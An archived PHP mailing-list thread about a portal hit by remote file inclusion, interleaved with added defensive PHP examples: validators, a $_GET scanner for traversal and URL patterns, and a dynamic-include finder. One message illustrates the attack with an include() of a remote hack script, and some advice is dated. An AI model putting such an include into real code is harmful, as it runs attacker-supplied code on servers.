 + @igorescobar (twitter)
 
 
 
 
 
 On Mon, Jun 7, 2010 at 2:38 PM, Michael Shadle mike...@gmail.com wrote:
 
  It's not that bad.
 
  Use filter functions and sanity checks for input.
 
  Use htmlspecialchars() basically on output.
 
  That should take care of basically everything.
 
 
  On Jun 7, 2010, at 6:16 AM, Igor Escobar titiolin...@gmail.com wrote:
 
   This was my fear.
 
  Regards,
  Igor Escobar
  Systems Analyst  Interface Designer
 
  + http://blog.igorescobar.com
  + http://www.igorescobar.com
  + @igorescobar (twitter)
 
 
 
 
 
  On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind peter.e.l...@gmail.com
  wrote:
 
   On 7 June 2010 14:54, Igor Escobar titiolin...@gmail.com wrote:
 
  Hi Folks!
 
  The portal for which I work is suffering constant attacks that I feel
 
  that
 
  is PHP Injection. Somehow the hacker is getting to change the cache
  files
  that our system generates. Concatenating the HTML file with another that
  have an iframe to a malicious JAR file. Do you have any suggestions to
  prevent this action? The hacker has no access to our file system, he is
  imputing the code through some security hole. The problem is that the
 
  portal
 
  is very big and has lots and lots partners hosted on our estructure
  structure. We are failing to identify the focus of this attacks.
 
  Any ideas?
 
 
  Check all user input + upload: make sure that whatever comes from the
  user is validated. Then check all output: make sure that everythin
  output is escaped properly. Yes, it's an enormous task, but there's no
  way around it.
 
  Regards
  Peter
 
  --
  hype
  WWW: http://plphp.dk / http://plind.dk
  LinkedIn: http://www.linkedin.com/in/plind
  BeWelcome/Couchsurfing: Fake51
  Twitter: http://twitter.com/kafe15
  /hype
 
 
  --
  PHP General Mailing List (http://www.php.net/)
  To unsubscribe, visit: http://www.php.net/unsub.php
 
 


What do you mean it's a PHP injection? PHP is all on the server, and the
only way to get at that if you don't have direct access to the server
(which you've said isn't possible as the passwords, etc. are all fine)
is bad data coming from either a form or another area where
user data is expected. This data might be as simple as unsanitised URL
variables that are intended to fetch a blog entry, to form data sent in
a registration page.

All data coming from the user is bad until proven otherwise.

Thanks,
Ash
http://www.ashleysheridan.co.uk




[PHP] combo box validation

2010-06-07 Thread David Mehler
Hello,
I've got a form with two combo boxes, one for the month one for the
day. Both are required. I've got code that checks the post submission
to ensure neither is empty. My problem is that if a user does not
select anything in the combo boxes January first is sent; this I don't
want. If they haven't selected anything I'd like that to show as an
error.
Thanks.
Dave.




Re: [PHP] Security Issue

2010-06-07 Thread Ashley Sheridan
On Mon, 2010-06-07 at 10:48 -0700, Michael Shadle wrote:

 Oh yeah. I do more than just intval() I make sure they didn't feed me  
 anything BUT numeric text first. I do sanity check before type  
 forcing :)
 
 I use garbage in garbage out. So I take what is given to me and yes I  
 escape if before the db of course as well, and then encode on output.
 
 On Jun 7, 2010, at 10:45 AM, Ashley Sheridan  
 a...@ashleysheridan.co.uk wrote:
 
  On Mon, 2010-06-07 at 10:38 -0700, Michael Shadle wrote:
 
  It's not that bad.
 
  Use filter functions and sanity checks for input.
 
  Use htmlspecialchars() basically on output.
 
  That should take care of basically everything.
 
  On Jun 7, 2010, at 6:16 AM, Igor Escobar titiolin...@gmail.com  
  wrote:
 
   This was my fear.
  
   Regards,
   Igor Escobar
   Systems Analyst  Interface Designer
  
   + http://blog.igorescobar.com
   + http://www.igorescobar.com
   + @igorescobar (twitter)
  
  
  
  
  
   On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind  
  peter.e.l...@gmail.com
   wrote:
  
   On 7 June 2010 14:54, Igor Escobar titiolin...@gmail.com wrote:
   Hi Folks!
  
   The portal for which I work is suffering constant attacks that I
   feel
   that
   is PHP Injection. Somehow the hacker is getting to change the
   cache files
   that our system generates. Concatenating the HTML file with
   another that
   have an iframe to a malicious JAR file. Do you have any
   suggestions to
   prevent this action? The hacker has no access to our file system,
   he is
   imputing the code through some security hole. The problem is that
   the
   portal
   is very big and has lots and lots partners hosted on our  
  estructure
   structure. We are failing to identify the focus of this attacks.
  
   Any ideas?
  
  
   Check all user input + upload: make sure that whatever comes  
  from the
   user is validated. Then check all output: make sure that everythin
   output is escaped properly. Yes, it's an enormous task, but  
  there's
   no
   way around it.
  
   Regards
   Peter
  
   --
   hype
   WWW: http://plphp.dk / http://plind.dk
   LinkedIn: http://www.linkedin.com/in/plind
   BeWelcome/Couchsurfing: Fake51
   Twitter: http://twitter.com/kafe15
   /hype
  
 
 
  htmlspecialchars() is really only good for user input that you are  
  outputting to the browser. For inserting data into a database, use  
  mysql_real_escape_string(). I find it's good to think carefully  
  about what sort of data I expect and sanitise it accordingly. If I  
  want a numerical value, I use intval($_GET['var']) or floatval().  
  For things like small text box elements, regex's work well depending  
  on the data. For data from select lists of checkboxes, make sure the  
  value given is within a list of pre-determined values you have.  
  Basically, nothing from the user should be trusted at all, ever.
 
  As soon as you let go of that trust in the good honesty of people  
  you'll do fine ;)
 
  Thanks,
  Ash
  http://www.ashleysheridan.co.uk
 
 


Why waste time validating an integer value when intval() will do that
for you?

Thanks,
Ash
http://www.ashleysheridan.co.uk
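
The input-handling points raised across this thread (integer handling with intval(), whitelisting select values, escaping per destination) and the combo box question posted the same day can be compared side by side. The PHP below is an added example, not code from the thread: field names, allowed values and sample inputs are constructed, and it uses PDO bound parameters where the thread mentions mysql_real_escape_string(), since the mysql extension was removed in PHP 7.0.

```php
<?php
// Added example, not code from the thread. Field names, allowed values and
// sample inputs are constructed; pdo_sqlite is assumed to be available.

/** Validate rather than coerce: null unless $raw is an integer in range. */
function requireInt($raw, int $min, int $max): ?int
{
    $v = filter_var($raw, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min, 'max_range' => $max]]);
    return $v === false ? null : $v;
}

/** Whitelist for select lists and checkboxes: only values the form offered. */
function requireOption($raw, array $allowed): ?string
{
    return is_string($raw) && in_array($raw, $allowed, true) ? $raw : null;
}

/**
 * Month/day combo boxes. Each <select> is assumed to start with
 * <option value="">, so an untouched box submits "" and is reported as an
 * error instead of being coerced to a default date.
 */
function validateDateForm(array $post): array
{
    $errors = [];
    $month = requireInt($post['month'] ?? '', 1, 12);
    $day   = requireInt($post['day'] ?? '', 1, 31);
    if ($month === null) {
        $errors['month'] = 'Select a month.';
    }
    if ($day === null) {
        $errors['day'] = 'Select a day.';
    }
    // 2000 is a leap year, so 29 February passes when no year is collected.
    if (!$errors && !checkdate($month, $day, 2000)) {
        $errors['day'] = 'That day does not exist in the selected month.';
    }
    return ['errors' => $errors, 'month' => $month, 'day' => $day];
}

// 1. intval() coerces whatever it is given; filter_var() accepts or rejects.
foreach (['42', '12abc', '', 'abc', ['x']] as $raw) {
    printf("%-8s intval=%d  requireInt=%s\n",
        json_encode($raw), intval($raw), var_export(requireInt($raw, 0, 1000), true));
}

// 2. Combo boxes: nothing selected, an impossible date, a valid date.
$submissions = [
    ['month' => '',  'day' => ''],
    ['month' => '2', 'day' => '30'],
    ['month' => '6', 'day' => '7'],
];
foreach ($submissions as $post) {
    echo json_encode($post), ' => ', json_encode(validateDateForm($post)), "\n";
}

// 3. Select-list whitelist: a value that was never offered is rejected.
foreach (['date', 'price'] as $sort) {
    printf("sort=%s accepted as %s\n",
        $sort, var_export(requireOption($sort, ['name', 'date']), true));
}

// 4. Escape per destination: bound parameters for the database,
//    htmlspecialchars() only when the value is written into HTML.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE comments (id INTEGER PRIMARY KEY, body TEXT)');

$body = "It's <b>bold</b> & \"quoted\"";              // constructed user input
$pdo->prepare('INSERT INTO comments (body) VALUES (?)')->execute([$body]);

$stored = $pdo->query('SELECT body FROM comments')->fetchColumn();
echo htmlspecialchars($stored, ENT_QUOTES, 'UTF-8'), "\n";
```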




Re: [PHP] Security Issue

2010-06-07 Thread Igor Escobar
I think we're getting off topic here folks...


Regards,
Igor Escobar
Systems Analyst  Interface Designer

+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)





On Mon, Jun 7, 2010 at 2:51 PM, Ashley Sheridan 
a...@ashleysheridan.co.uk wrote:

  On Mon, 2010-06-07 at 10:48 -0700, Michael Shadle wrote:

 Oh yeah. I do more than just intval() I make sure they didn't feed me
 anything BUT numeric text first. I do sanity check before type
 forcing :)

 I use garbage in garbage out. So I take what is given to me and yes I
 escape if before the db of course as well, and then encode on output.

 On Jun 7, 2010, at 10:45 AM, Ashley Sheridan
 a...@ashleysheridan.co.uk wrote:

  On Mon, 2010-06-07 at 10:38 -0700, Michael Shadle wrote:
 
  It's not that bad.
 
  Use filter functions and sanity checks for input.
 
  Use htmlspecialchars() basically on output.
 
  That should take care of basically everything.
 
  On Jun 7, 2010, at 6:16 AM, Igor Escobar titiolin...@gmail.com
  wrote:
 
   This was my fear.
  
   Regards,
   Igor Escobar
   Systems Analyst  Interface Designer
  
   + http://blog.igorescobar.com
   + http://www.igorescobar.com
   + @igorescobar (twitter)
  
  
  
  
  
   On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind
  peter.e.l...@gmail.com
   wrote:
  
   On 7 June 2010 14:54, Igor Escobar titiolin...@gmail.com wrote:
   Hi Folks!
  
   The portal for which I work is suffering constant attacks that I
   feel
   that
   is PHP Injection. Somehow the hacker is getting to change the
   cache files
   that our system generates. Concatenating the HTML file with
   another that
   have an iframe to a malicious JAR file. Do you have any
   suggestions to
   prevent this action? The hacker has no access to our file system,
   he is
   imputing the code through some security hole. The problem is that
   the
   portal
   is very big and has lots and lots partners hosted on our
  estructure
   structure. We are failing to identify the focus of this attacks.
  
   Any ideas?
  
  
   Check all user input + upload: make sure that whatever comes
  from the
   user is validated. Then check all output: make sure that everything
   output is escaped properly. Yes, it's an enormous task, but
  there's
   no
   way around it.
  
   Regards
   Peter
  
   --
   hype
   WWW: http://plphp.dk / http://plind.dk
   LinkedIn: http://www.linkedin.com/in/plind
   BeWelcome/Couchsurfing: Fake51
   Twitter: http://twitter.com/kafe15
   /hype
  
 
 
  htmlspecialchars() is really only good for user input that you are
  outputting to the browser. For inserting data into a database, use
  mysql_real_escape_string(). I find it's good to think carefully
  about what sort of data I expect and sanitise it accordingly. If I
  want a numerical value, I use intval($_GET['var']) or floatval().
  For things like small text box elements, regex's work well depending
  on the data. For data from select lists of checkboxes, make sure the
  value given is within a list of pre-determined values you have.
  Basically, nothing from the user should be trusted at all, ever.
 
  As soon as you let go of that trust in the good honesty of people
  you'll do fine ;)
 
  Thanks,
  Ash
  http://www.ashleysheridan.co.uk
 
 


 Why waste time validating an integer value when intval() will do that for
 you?


   Thanks,
 Ash
 http://www.ashleysheridan.co.uk





Re: [PHP] Security Issue

2010-06-07 Thread Michael Shadle
You could do generic things to modify the $_GET and other superglobal  
arrays. For example if you wanted to implement magic quote yourself  
have a recursive function (I'd paste one but I'm on my phone) but  
something akin to this:


$_GET = your_function_name($_GET);

An idea for you might be to look for / or .. and reject or sanitize  
that in some fashion. Really hard to speak on what would safely work  
across the website globally (you could also just modify those specific  
array indexes of $_GET that have filenames or something the cache uses)


Hope that makes sense. iPhones aren't the easiest to explain (or  
bottom post)


On Jun 7, 2010, at 10:42 AM, Igor Escobar titiolin...@gmail.com wrote:


It's not a SQL Injection or XSS problem, Michael.

It's a PHP Injection problem. I know how fix that but the web site  
is very very huge, have lots and lots of partners and i'm have a bug  
difficult do identify the focus of the problem.


Got it?


Regards,
Igor Escobar
Systems Analyst  Interface Designer

+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)





On Mon, Jun 7, 2010 at 2:38 PM, Michael Shadle mike...@gmail.com  
wrote:

It's not that bad.

Use filter functions and sanity checks for input.

Use htmlspecialchars() basically on output.

That should take care of basically everything.


On Jun 7, 2010, at 6:16 AM, Igor Escobar titiolin...@gmail.com  
wrote:


This was my fear.

Regards,
Igor Escobar
Systems Analyst  Interface Designer

+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)





On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind peter.e.l...@gmail.com  
wrote:


On 7 June 2010 14:54, Igor Escobar titiolin...@gmail.com wrote:
Hi Folks!

The portal for which I work is suffering constant attacks that I feel
that
is PHP Injection. Somehow the hacker is getting to change the cache  
files
that our system generates. Concatenating the HTML file with another  
that

have an iframe to a malicious JAR file. Do you have any suggestions to
prevent this action? The hacker has no access to our file system, he  
is

imputing the code through some security hole. The problem is that the
portal
is very big and has lots and lots partners hosted on our estructure
structure. We are failing to identify the focus of this attacks.

Any ideas?


Check all user input + upload: make sure that whatever comes from the
user is validated. Then check all output: make sure that everything
output is escaped properly. Yes, it's an enormous task, but there's no
way around it.

Regards
Peter

--
hype
WWW: http://plphp.dk / http://plind.dk
LinkedIn: http://www.linkedin.com/in/plind
BeWelcome/Couchsurfing: Fake51
Twitter: http://twitter.com/kafe15
/hype


--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
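
Added example (not part of the message above and not anyone's code from this thread): one way to write the recursive walk over $_GET that the message describes, flagging values that contain "/", "..", a backslash, a NUL byte or a URL scheme. The function name find_path_like_values(), the reason labels and the sample request are assumptions made for the illustration, and the short array syntax assumes PHP 5.4 or later.

```php
<?php
// Added illustration, not code from the thread. Walks a request array
// recursively and reports every scalar value that looks like a path or URL.

/**
 * @param array  $input  e.g. $_GET, $_POST or $_COOKIE
 * @param string $prefix parameter name built up during recursion
 * @return array list of ['param' => string, 'value' => string, 'reasons' => array]
 */
function find_path_like_values(array $input, $prefix = '')
{
    // Properties a value should not have if it may reach include(),
    // fopen() or the name of a cache file.
    $checks = [
        'NUL byte'         => '/\x00/',
        'parent directory' => '/\.\./',
        'path separator'   => '#[/\\\\]#',
        'URL scheme'       => '#^\s*[a-z][a-z0-9+.\-]*:#i',
    ];

    $hits = [];
    foreach ($input as $key => $value) {
        $name = ($prefix === '') ? (string) $key : $prefix . '[' . $key . ']';
        if (is_array($value)) {
            // ?opts[skin][css]=... arrives as nested arrays, so recurse.
            $hits = array_merge($hits, find_path_like_values($value, $name));
            continue;
        }
        $value = (string) $value;
        $reasons = [];
        foreach ($checks as $reason => $pattern) {
            if (preg_match($pattern, $value) === 1) {
                $reasons[] = $reason;
            }
        }
        if ($reasons) {
            $hits[] = ['param' => $name, 'value' => $value, 'reasons' => $reasons];
        }
    }
    return $hits;
}

// Constructed sample standing in for $_GET.
$request = [
    'page' => 'news',
    'id'   => '42',
    'tpl'  => '../../cache/index.html',
    'opts' => ['lang' => 'pt', 'skin' => ['css' => 'http://example.invalid/x.css']],
];

$hits = find_path_like_values($request);
foreach ($hits as $hit) {
    // In a live front controller this line would go to the error log
    // together with the client address and the request URI.
    printf("%s = '%s' (%s)\n", $hit['param'], $hit['value'], implode(', ', $hit['reasons']));
}
if ($hits) {
    echo "request rejected\n";   // e.g. answer with HTTP 400 and stop
}
```

Logging every hit with the request URI also helps with the open question in this thread, because it shows which script and parameter are being probed.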




Re: [PHP] combo box validation

2010-06-07 Thread Ashley Sheridan
On Mon, 2010-06-07 at 13:49 -0400, David Mehler wrote:

 Hello,
 I've got a form with two combo boxes, one for the month one for the
 day. Both are required. I've got code that checks the post submission
 to ensure neither is empty. My problem is that if a user does not
 select anything in the combo boxes January first is sent, this i don't
 want. If they haven't selected anything i'd like that to show as an
 error.
 Thanks.
 Dave.
 


Make the first item in the select list something like this:

<option value="0" selected="selected">-- select month --</option>

Then just check for the 0 value in PHP when the form is submitted.

Thanks,
Ash
http://www.ashleysheridan.co.uk




Re: [PHP] Security Issue

2010-06-07 Thread Michael Shadle
Because that only typecasts it. It's safe but it isn't what the user  
actually entered.


This way I can actually determine if the user put in 123abc and  
reject it, not accept it and keep the 123 silently for example. Same  
with floats. You may or may not consider a negative number acceptable,  
or with ints and floats 0 might not be acceptable too. So it's some  
analysis before intval/floatval/etc. I want to return to the user with  
a rejection notice so they literally get what they gave me (assuming  
it passes the sanity check) - it's not just simple silently  
typecasting and giving them something they didn't give me.


And I meant to say garbage in, garbage out*

* properly encoded or sanitized of course

:)

On Jun 7, 2010, at 10:51 AM, Ashley Sheridan  
a...@ashleysheridan.co.uk wrote:




Why waste time validating an integer value when intval() will do  
that for you?


Thanks,
Ash
http://www.ashleysheridan.co.uk
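
Added example (not from either poster): the difference discussed above between casting with intval() and validating first, using filter_var() with FILTER_VALIDATE_INT so that input such as 123abc is rejected instead of silently becoming 123. The helper name parse_strict_int(), the 1..999 range and the sample inputs are assumptions made for the illustration.

```php
<?php
// Added illustration, not code from the thread.

/**
 * Return the integer only if $raw is, in full, a decimal integer inside
 * [$min, $max]; otherwise return null so the caller can reject the input
 * and tell the user, instead of storing a value the user never typed.
 */
function parse_strict_int($raw, $min, $max)
{
    if (!is_string($raw)) {
        return null;               // e.g. ?qty[]=1 delivers an array
    }
    $value = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => $min, 'max_range' => $max],
    ]);
    return ($value === false) ? null : $value;
}

// Constructed inputs for a hypothetical "quantity" field that must be 1..999.
$inputs = ['42', '123abc', 'abc', '-7', '0', '', ['1']];

foreach ($inputs as $raw) {
    $strict = parse_strict_int($raw, 1, 999);
    printf(
        "%-10s intval: %-6s strict: %s\n",
        json_encode($raw),
        intval($raw),              // always yields some integer, even for junk
        $strict === null ? 'rejected' : $strict
    );
}
```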


Re: [PHP] Security Issue

2010-06-07 Thread Igor Escobar
PHP Injection is the technical name given to a security hole in PHP
applications. When this gap there is a hacker can do with an external code
that is interpreted as an inner code as if the code included was more a part
of the script.

// my code...
// my code...
include ('http:///externalhackscript.txt');
//my code...
//my code..

I know how to fix that too. The problem is: WHERE I HAVE TO FIX THAT.

Got it?


Regards,
Igor Escobar
Systems Analyst  Interface Designer

+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)





On Mon, Jun 7, 2010 at 2:48 PM, Ashley Sheridan 
a...@ashleysheridan.co.uk wrote:

 On Mon, 2010-06-07 at 14:42 -0300, Igor Escobar wrote:

  It's not a SQL Injection or XSS problem, Michael.
 
  It's a PHP Injection problem. I know how fix that but the web site is
 very
  very huge, have lots and lots of partners and i'm have a bug difficult do
  identify the focus of the problem.
 
  Got it?
 
 
  Regards,
  Igor Escobar
  Systems Analyst  Interface Designer
 
  + http://blog.igorescobar.com
  + http://www.igorescobar.com
  + @igorescobar (twitter)
 
 
 
 
 
  On Mon, Jun 7, 2010 at 2:38 PM, Michael Shadle mike...@gmail.com
 wrote:
 
   It's not that bad.
  
   Use filter functions and sanity checks for input.
  
   Use htmlspecialchars() basically on output.
  
   That should take care of basically everything.
  
  
   On Jun 7, 2010, at 6:16 AM, Igor Escobar titiolin...@gmail.com
 wrote:
  
This was my fear.
  
   Regards,
   Igor Escobar
   Systems Analyst  Interface Designer
  
   + http://blog.igorescobar.com
   + http://www.igorescobar.com
   + @igorescobar (twitter)
  
  
  
  
  
   On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind peter.e.l...@gmail.com
   wrote:
  
On 7 June 2010 14:54, Igor Escobar titiolin...@gmail.com wrote:
  
   Hi Folks!
  
   The portal for which I work is suffering constant attacks that I
 feel
  
   that
  
   is PHP Injection. Somehow the hacker is getting to change the cache
   files
   that our system generates. Concatenating the HTML file with another
 that
   have an iframe to a malicious JAR file. Do you have any suggestions
 to
   prevent this action? The hacker has no access to our file system, he
 is
   imputing the code through some security hole. The problem is that
 the
  
   portal
  
   is very big and has lots and lots partners hosted on our estructure
   structure. We are failing to identify the focus of this attacks.
  
   Any ideas?
  
  
   Check all user input + upload: make sure that whatever comes from the
   user is validated. Then check all output: make sure that everything
   output is escaped properly. Yes, it's an enormous task, but there's
 no
   way around it.
  
   Regards
   Peter
  
   --
   hype
   WWW: http://plphp.dk / http://plind.dk
   LinkedIn: http://www.linkedin.com/in/plind
   BeWelcome/Couchsurfing: Fake51
   Twitter: http://twitter.com/kafe15
   /hype
  
  
   --
   PHP General Mailing List (http://www.php.net/)
   To unsubscribe, visit: http://www.php.net/unsub.php
  
  


 What do you mean it's a PHP injection? PHP is all on the server, and the
 only way to get at that if you don't have direct access to the server
 (which you've said isn't possible as the passwords, etc are all fine)
 then the bad data is coming from either a form or another area where
 user data is expected. This data might be as simple as unsanitised URL
 variables that are intended to fetch a blog entry, to form data sent in
 a registration page.

 All data coming from the user is bad until proven otherwise.

 Thanks,
 Ash
 http://www.ashleysheridan.co.uk
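
Added example (not code from the thread or from the portal in question): a heuristic for the "where do I have to fix that" problem, using PHP's tokenizer to list every include/require whose argument contains a variable or a URL, which are the statements where request data could choose the file that gets executed. The function name find_dynamic_includes() and the sample source are assumptions made for the illustration; example.invalid is a placeholder host.

```php
<?php
// Added illustration, not code from the thread.

/**
 * @param string $source PHP source code including its opening tag
 * @return array list of ['line' => int, 'reason' => string, 'code' => string]
 */
function find_dynamic_includes($source)
{
    $include_tokens = [T_INCLUDE, T_INCLUDE_ONCE, T_REQUIRE, T_REQUIRE_ONCE];
    $tokens = token_get_all($source);
    $count = count($tokens);
    $findings = [];

    for ($i = 0; $i < $count; $i++) {
        $tok = $tokens[$i];
        if (!is_array($tok) || !in_array($tok[0], $include_tokens, true)) {
            continue;
        }
        $code = $tok[1];
        $reasons = [];
        // Read the argument expression up to the end of the statement.
        for ($j = $i + 1; $j < $count; $j++) {
            $arg = $tokens[$j];
            if ($arg === ';' || (is_array($arg) && $arg[0] === T_CLOSE_TAG)) {
                break;
            }
            $code .= is_array($arg) ? $arg[1] : $arg;
            if (!is_array($arg)) {
                continue;
            }
            if ($arg[0] === T_VARIABLE) {
                // Covers $x, $_GET['x'] and variables inside "double quotes".
                $reasons['variable ' . $arg[1] . ' in path'] = true;
            } elseif (in_array($arg[0], [T_CONSTANT_ENCAPSED_STRING, T_ENCAPSED_AND_WHITESPACE], true)
                && strpos($arg[1], '://') !== false) {
                $reasons['URL in path'] = true;
            }
        }
        if ($reasons) {
            $findings[] = [
                'line'   => $tok[2],
                'reason' => implode(', ', array_keys($reasons)),
                'code'   => trim(preg_replace('/\s+/', ' ', $code)),
            ];
        }
    }
    return $findings;
}

// Constructed sample file; in an audit, pass the contents of each .php file.
$sample = <<<'PHP'
<?php
include 'header.php';
require_once dirname(__FILE__) . '/lib/cache.php';
include $_GET['page'] . '.php';
include "partners/{$partner}/footer.php";
include 'http://example.invalid/banner.txt';
PHP;

foreach (find_dynamic_includes($sample) as $f) {
    printf("line %d: %s\n    %s\n", $f['line'], $f['reason'], $f['code']);
}
```

A flagged line is a place to review, not proof of a hole: the variable may be set from a fixed list. Independently of the code audit, the php.ini setting allow_url_include = Off stops include from fetching a remote URL.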





[PHP] Test [don't read]

2010-06-07 Thread tedd


--
---
http://sperling.com  http://ancientstones.com  http://earthstones.com




Re: [PHP] Security Issue

2010-06-07 Thread Igor Escobar
I totally agree with you Ash,

I came up here to ask you guys for some light. Anything to help me to track
that M%$#% F#$CK#$# and discover from where he's attacking.


Regards,
Igor Escobar
Systems Analyst  Interface Designer

+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)





On Mon, Jun 7, 2010 at 3:06 PM, Ashley Sheridan 
a...@ashleysheridan.co.uk wrote:

  On Mon, 2010-06-07 at 15:00 -0300, Igor Escobar wrote:

 PHP Injection is the technical name given to a security hole in PHP
 applications. When this gap there is a hacker can do with an external code
 that is interpreted as an inner code as if the code included was more a part
 of the script.



  // my code...

  // my code...

  include ('http:///externalhackscript.txt');

  //my code...

  //my code..



  I know how to fix that too. The problem is: WHERE I HAVE TO FIX THAT.



  Got it?





  Regards,
 Igor Escobar
 Systems Analyst  Interface Designer

 + http://blog.igorescobar.com
 + http://www.igorescobar.com
 + @igorescobar (twitter)





  On Mon, Jun 7, 2010 at 2:48 PM, Ashley Sheridan a...@ashleysheridan.co.uk
 wrote:


   On Mon, 2010-06-07 at 14:42 -0300, Igor Escobar wrote:

  It's not a SQL Injection or XSS problem, Michael.
 
  It's a PHP Injection problem. I know how fix that but the web site is
 very
  very huge, have lots and lots of partners and i'm have a bug difficult do
  identify the focus of the problem.
 
  Got it?
 
 
  Regards,
  Igor Escobar
  Systems Analyst  Interface Designer
 
  + http://blog.igorescobar.com
  + http://www.igorescobar.com
  + @igorescobar (twitter)
 
 
 
 
 
  On Mon, Jun 7, 2010 at 2:38 PM, Michael Shadle mike...@gmail.com
 wrote:
 
   It's not that bad.
  
   Use filter functions and sanity checks for input.
  
   Use htmlspecialchars() basically on output.
  
   That should take care of basically everything.
  
  
   On Jun 7, 2010, at 6:16 AM, Igor Escobar titiolin...@gmail.com
 wrote:
  
This was my fear.
  
   Regards,
   Igor Escobar
   Systems Analyst  Interface Designer
  
   + http://blog.igorescobar.com
   + http://www.igorescobar.com
   + @igorescobar (twitter)
  
  
  
  
  
   On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind peter.e.l...@gmail.com
   wrote:
  
On 7 June 2010 14:54, Igor Escobar titiolin...@gmail.com wrote:
  
   Hi Folks!
  
   The portal for which I work is suffering constant attacks that I
 feel
  
   that
  
   is PHP Injection. Somehow the hacker is getting to change the cache
   files
   that our system generates. Concatenating the HTML file with another
 that
   have an iframe to a malicious JAR file. Do you have any suggestions
 to
   prevent this action? The hacker has no access to our file system, he
 is
   imputing the code through some security hole. The problem is that
 the
  
   portal
  
   is very big and has lots and lots partners hosted on our estructure
   structure. We are failing to identify the focus of this attacks.
  
   Any ideas?
  
  
   Check all user input + upload: make sure that whatever comes from the
   user is validated. Then check all output: make sure that everything
   output is escaped properly. Yes, it's an enormous task, but there's
 no
   way around it.
  
   Regards
   Peter
  
   --
   hype
   WWW: http://plphp.dk / http://plind.dk
   LinkedIn: http://www.linkedin.com/in/plind
   BeWelcome/Couchsurfing: Fake51
   Twitter: http://twitter.com/kafe15
   /hype
  
  
   --
   PHP General Mailing List (http://www.php.net/)
   To unsubscribe, visit: http://www.php.net/unsub.php
  
  



   What do you mean it's a PHP injection? PHP is all on the server, and the
 only way to get at that if you don't have direct access to the server
 (which you've said isn't possible as the passwords, etc are all fine)
 then the bad data is coming from either a form or another area where
 user data is expected. This data might be as simple as unsanitised URL
 variables that are intended to fetch a blog entry, to form data sent in
 a registration page.

 All data coming from the user is bad until proven otherwise.



 Thanks,
 Ash
 http://www.ashleysheridan.co.uk





 That data is still coming from somewhere, so is still badly sanitised data
 either coming from a form or a URL. You really should go over all the code
 to find these and root them out, which is a mammoth task. To narrow it down,
 those access logs I mentioned before will help. I think there are ways you
 can automatically detect security holes in your software, but if none of
 your user data is sanitised correctly, then virtually everything is a
 potential security hole.


   Thanks,
 Ash
 http://www.ashleysheridan.co.uk





[PHP] Re: Test [don't read]

2010-06-07 Thread João Cândido de Souza Neto
I couldn't resist.


tedd tedd.sperl...@gmail.com escreveu na mensagem 
news:p0624080cc832e662f...@[192.168.1.102]...

 -- 
 ---
 http://sperling.com  http://ancientstones.com  http://earthstones.com 




Re: [PHP] Security Issue

2010-06-07 Thread Michael Shadle
I disagree and this kind of approach could be appropriate if you walk  
your input globals and apply some sanity checks and appropriate  
filtering you could fix the issue.



On Jun 7, 2010, at 10:52 AM, Igor Escobar titiolin...@gmail.com wrote:


I think we're getting off topic here folks...


Regards,
Igor Escobar
Systems Analyst  Interface Designer

+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)





On Mon, Jun 7, 2010 at 2:51 PM, Ashley Sheridan a...@ashleysheridan.co.uk 
 wrote:

On Mon, 2010-06-07 at 10:48 -0700, Michael Shadle wrote:


Oh yeah. I do more than just intval() I make sure they didn't feed me
anything BUT numeric text first. I do sanity check before type
forcing :)

I use garbage in garbage out. So I take what is given to me and yes I
escape it before the db of course as well, and then encode on output.

On Jun 7, 2010, at 10:45 AM, Ashley Sheridan
a...@ashleysheridan.co.uk wrote:

 On Mon, 2010-06-07 at 10:38 -0700, Michael Shadle wrote:

 It's not that bad.

 Use filter functions and sanity checks for input.

 Use htmlspecialchars() basically on output.

 That should take care of basically everything.

 On Jun 7, 2010, at 6:16 AM, Igor Escobar titiolin...@gmail.com
 wrote:

  This was my fear.
 
  Regards,
  Igor Escobar
  Systems Analyst  Interface Designer
 
  + http://blog.igorescobar.com
  + http://www.igorescobar.com
  + @igorescobar (twitter)
 
 
 
 
 
  On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind
 peter.e.l...@gmail.com
  wrote:
 
  On 7 June 2010 14:54, Igor Escobar titiolin...@gmail.com  
wrote:

  Hi Folks!
 
  The portal for which I work is suffering constant attacks  
that I

  feel
  that
  is PHP Injection. Somehow the hacker is getting to change the
  cache files
  that our system generates. Concatenating the HTML file with
  another that
  have an iframe to a malicious JAR file. Do you have any
  suggestions to
  prevent this action? The hacker has no access to our file  
system,

  he is
  imputing the code through some security hole. The problem is  
that

  the
  portal
  is very big and has lots and lots partners hosted on our
 estructure
  structure. We are failing to identify the focus of this  
attacks.

 
  Any ideas?
 
 
  Check all user input + upload: make sure that whatever comes
 from the
  user is validated. Then check all output: make sure that  
everything

  output is escaped properly. Yes, it's an enormous task, but
 there's
  no
  way around it.
 
  Regards
  Peter
 
  --
  hype
  WWW: http://plphp.dk / http://plind.dk
  LinkedIn: http://www.linkedin.com/in/plind
  BeWelcome/Couchsurfing: Fake51
  Twitter: http://twitter.com/kafe15
  /hype
 


 htmlspecialchars() is really only good for user input that you are
 outputting to the browser. For inserting data into a database, use
 mysql_real_escape_string(). I find it's good to think carefully
 about what sort of data I expect and sanitise it accordingly. If I
 want a numerical value, I use intval($_GET['var']) or floatval().
 For things like small text box elements, regex's work well  
depending
 on the data. For data from select lists of checkboxes, make sure  
the

 value given is within a list of pre-determined values you have.
 Basically, nothing from the user should be trusted at all, ever.

 As soon as you let go of that trust in the good honesty of people
 you'll do fine ;)

 Thanks,
 Ash
 http://www.ashleysheridan.co.uk




